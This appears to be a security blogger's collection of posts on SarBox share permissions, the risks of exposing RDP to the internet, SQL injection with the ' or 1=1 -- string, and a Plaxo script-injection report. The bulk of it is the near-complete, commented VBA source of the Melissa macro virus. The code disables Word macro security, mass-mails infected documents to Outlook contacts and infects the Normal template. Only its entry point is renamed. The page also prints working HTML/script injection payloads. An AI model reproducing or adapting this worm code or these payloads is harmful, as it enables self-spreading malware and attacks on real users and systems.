James D. Stallardblog

A question was raised on SecuirtyFocus MS on the impact that SarBox (and other coporate governance legislation) might have on setting up security on fuile servers. In particular; how it relates to setting up share permissions. The questioner wished to know what he should do to pass an audit on his share permissions.

While setting correct share permission is by no means the be-all and end-all of a SarBox audit, the following covers this particular area...

The central tenets of applying Sarbanes-Oxley to IT systems are (in the light of clear guidance being rather lacking in the legislation itself):

. Minimal, provable, repeatable, auditable.

In other words, when applying permission, you stick to the least priveledge model, you document your settings, you log access, you log attempts to change or circumvent the permissions and you change control both alterations to the permission, and who receives it. These steps should get you through your audit.

Obviously, each user must be personally accountable, so unless there is a clear business requirement (and hence a process required), each user must have a personal, non-shared account.

I have found that the real trick of compliance is not to pass the audit in the first year, but to be able to pass the audit every year, without spending all your time on SarBox compliance work and getting bogged down in paperwork.

Lastly, full control anywhere is a bad idea, and there is very rarely a need for it outside of the administrators (and suprisingly rarely even then). Full control on share permissions will permit the users connecting to that share to alter permissions on the files they have created (IE own), up to and including denying themselves access. This sort of thing potentially complicates backups and as it requires the admin to take control of the file/folder to repair such actions, it also messes up any quota systems you have put in. I have personally never seen a case where share permissions of everyone:full control was a good idea, and I was very glad to see that Windows 2003 removed that as the default setting on new shares.

As the result of some recent discussions in one of the online security lists I have been asked a few questions on the issues of publishing Terminal Services (Remote Desktop Protocol or RDP) to the internet. Without the benefit of a VPN to protect the TS Server. I thought I'd post the standard answer here:

RDP/Terminal Services listens on port 3389.

It is a well-known port and will therefore be subject to attack, within hours of you allowing it inbound on your firewall. I personally see around 300 attacks a week on my personal systems for just this potential vulnerability. I don't even have this port open and the attacks are due to a dumb agent probing vast ranges of IP addresses on the off chance that some will respond. Later, the responding IP's are subjected to a more considered attack.

While it is simple to secure the listening server with a password policy that permanently locks accounts after a small number of tries - hence defeating brute force attacks, you are still totally vulnerable to flaws in the intermediate services. These might take the form of the following:

Man-in-the-middle type attacks.
This is where your credentials are sniffed from the ether, typically by targeting the client, rather than the server. Your credentials are then to impersonate you and unless your are diligently reading your logs, you'll likely never know.

DNS Hijacking or Phishing
The is where you think you're attaching to your server, but in reality are attaching to someone else's. You mistakenly log into their fake service and after it approximates some fake, but legitimate looking error, your credentials are again used to impersonate you.

Attacks directly on the RDP/TS Service.
The is where the attacker uses flaws in the software itself to directly hack your server. In recent times, it has been mostly the buffer overflow, but now these vulnerabilities are generally sorted by Microsoft before the product goes to market, more highly skilled hackers are returning to the much older methods of malformed requests and TCP packets. A typical scenario is where your invalid data causes the service to crash and drop out into executable RAM, taking with it your payload of code that causes the server to respond to your control. It mught sound like Sci-Fi, but this is exactly how software has been commonly hacked for years before script kiddies came along.

There are probably another dozen good reasons for not publishing RDP/Terminal Services directly to the internet, but this should scare you enough to put in a VPN or some other form of intermediate security.

Calm down, you're NOT in danger!

I found this in my archives this evening. It's PERFECTLY safe in this form, but your AV scanner will find it your temporary internet files cache and go a bit nuts. Don't worry, you can't be got with it, just delete it or whatever. Unless you copy this code into a Word VBA module and save it, then run it, you CANNOT BE ADVERSELY AFFECTED!

Feeling better now? Onto the post...

It's the commented source code for the Melissa virus (remember that puppy!). I managed to cause an international incident when I posted this the first time (back in April 1999), but in the interests of education, here it is again. It's not really any harm these days as all it's attack vectors are well covered by all modern AV software, but as the first email-aware macro virus, it defined a new and worrying world for us.

Enjoy!

---

' Melissa Virus
' DO NOT RUN
' Reverse Engineered and Commented by James D. Stallard

Private Sub Document_Open1()

' Originally ran from Document_Open(), but this was altered to protect the viewer

' Hide error messages and keep going regardless
On Error Resume Next

' Check for the Registry Key

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then

' If it exists remove your protection
' Switch off the menu option to alter macro security in Word 2000
' Set the Word2000 security level to its lowest level

CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else

' If it doesn't exist remove your protection
' Switch off the macro menu options in Word 97
' Turn off the warnings

CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

' Declare some variables
' Instantiate a default email object, works even if Outlook is not actually running
' Initialise MAPI for use

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")


If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then

' Check for the Registry Key
' If it exists

If UngaDasOutlook = "Outlook" Then

' Check that Outlook is your default MAPI Client
' Logon to the default MAPI profile using the default/saved password

DasMapiName.Logon "profile", "password"

' Hunt for all your address lists

For y = 1 To DasMapiName.AddressLists.Count

' Pick the first address list from the list

Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)

' Loop through the first fifty entries in the current address list
' And add each entry to the recipients list
' Note: each entry could be another address list in its own right

For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo

' Build outgoing email Subject and Body
' Attach the current Word DOC
' Note: The new attachment will be this DOC not necessarily LIST.DOC
' Send the offending email

BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else "
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send

' Reset the recipients list

Peep = ""

' Do the whole thing again for the next address list until they are all done

Next y

' Logoff the MAPI Profile

DasMapiName.Logoff

End If

' Set the Registry entry to avoid re-sending the mail from the current victim

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If

' Current Document infection code
' This is redundant in the live virus, but could be altered to delete itself upon re-infection
' The virus checks first the existance of the code and then its name
' For the current document and the default template file
' Variables and objects using prefixes AD and NT refer to Active Document and Normal Template

Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)

NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2

' If the code module in the current document is not called "Melissa" then rename it to "Melissa"

If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If

' If the code module in the default template file is not called "Melissa" then rename it to "Melissa"

If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

' If both the active document and the normal template are infected then goto the code beginning CYA:

If DoNT <> True And DoAD <> True Then GoTo CYA

' If the Normal Template is not infected
' The code infects the Normal Template by copying the virus code into it line by line - odd

If DoNT = True Then

Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop

ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")

Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop

End If

' If the Active Document is not infected
' The code infects the Active Document by copying the virus code into it line by line - odd

If DoAD = True Then

Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop

ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")

Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop

End If

' If the current document has a filename, other than containing the word "Document"
' Note: This is because when a document is first created it default filename is "DocumentN" N being a number
' Unless the template properties are altered, but this happens rarely
' If filename OK (not "DocumentN")
' Save the document under the current filename
' If filename not OK (contains "DocumentN")
' Set the saved flag to true

CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If

' The following comments are unaltered from the original

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

' Payload
' Small and non damaging message is displayed
' If the number of todays date is the same as the number of the current minute then display the message in quotes below

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

' The message is a quote from Bart Simpson from The Simpsons it refers to a scrabble game he won against Lisa
' The attributed author's (Kwyjibo) name is the Word Bart used to get the high score mentioned above

End Sub

---

What is ' or 1=1 --?

It's pronounced: Apostrophe or one equals one dash dash. It lives at http://www.apostropheor1equals1dashdash.com/

I can't possibly explain it any better than Thor HOG. So, in his own words:

---

Basically, this got started from a thread over on Pen-test where we were talking about the legality of "testing" a web app or portal for potential security/injection issues and what is and isn't legal/ethical. Many stipulated that simply typing in something like ' or 1=1-- (your standard check for SQL injection) was a violation of the law and an attempt at "hacking." Sadly, there was actually a case where a guy doing something similar (think he did some ../../ stuff in a URL) got him arrested and he had to defend himself against possible charges because the admin claimed it was an attack. I basically contend two things: one, if someone publishes a web form out there, I have every "right" to put whatever I want in that web form, particularly if it is a site where I'm about to make some sort of purchase or submission of personal information without fearing that I'll get arrested. That's not to say that I have a right to hork their DB if I can indeed perform SQL injection-- that's a different story-- but one should be able to type in ' or 1=1 -- without fear of arrest. Two, the amount of SQL injection still out there is amazing given this day and age. Sure, I can see it 5 years ago, but there's really no excuse for it now.

Enter ' or 1=1--. That's the legal name of the entity. People can now freely type in ' or 1=1-- into a web form to specify the organization they are associated with, or to search a site to see if the portal is a member of ' or 1=1--. If the name of our organization happens to cause an error on the site, two things happen-- the person typing it in is "protected" by being able to reference a pre-existing, legal entity of that name, and hopefully, the site admin gets a free initial lesson in security without having it come from a full-fledged break-in.

---

So ' or 1=1 -- is an attempt to further the cause of security against SQL injection, while protecting those proponents from the misguided arm of the law.

If SQL injection is news to you then check out the results of a google search. To give a good idea what is possible, and indeed common, I bring you my favourite true story of code injection, courtesy of http-equiv and posted on NTBugTraq back in March 2004:

---

From: http-equiv at excite dot com
Subject: PLAXO: is that a cure or a disease?
Date: Friday, March 12, 2004

Having a firm belief in unnecessary gadgetry, we recently sent our most senior colleague Liu Die Yu a request to update his contact information via our plaxo device [http://www.plaxo.com/]. Checking back several hours later in our plaxo web account we eagerly selected his "card" to see what that update might be.

BANG !

input type="hidden" name="SetReplied" value="">
input type="hidden" name="perm" value="1">
input type="hidden" name="saveChanges" value="1">
input type="hidden" name="close" value="0">
input type="hidden" name="Biz.FullName" value="fatcat">
input type="hidden" name="Biz.Title" value="">
iframe src=http://www.bloatedcorp.com>">
input type="hidden" name="Biz.Email1" value="fatcat@bloatedcorp.com">
input type="hidden" name="Biz.Email2" value="">
input type="hidden" name="Biz.Email3" value="">
input type="hidden" name="Biz.IM" value="">
input type="hidden" name="Biz.WebPage" value="">

He had taken our entire contact list for a joyride supreme.

Trivial arbitrary code injection into the plaxo user web account. While it does a good job of attempting to defeat this, simple input in the recipient request for update field of "JOB TITLE", gives a real jobbing:

">
SCRIPT>alert('boop')/SCRIPT>
">
iframe src=http://www.bloatedcorp.com>

Needless to say should you receive one of these irritating little requests, you'll now know what to do.


End Call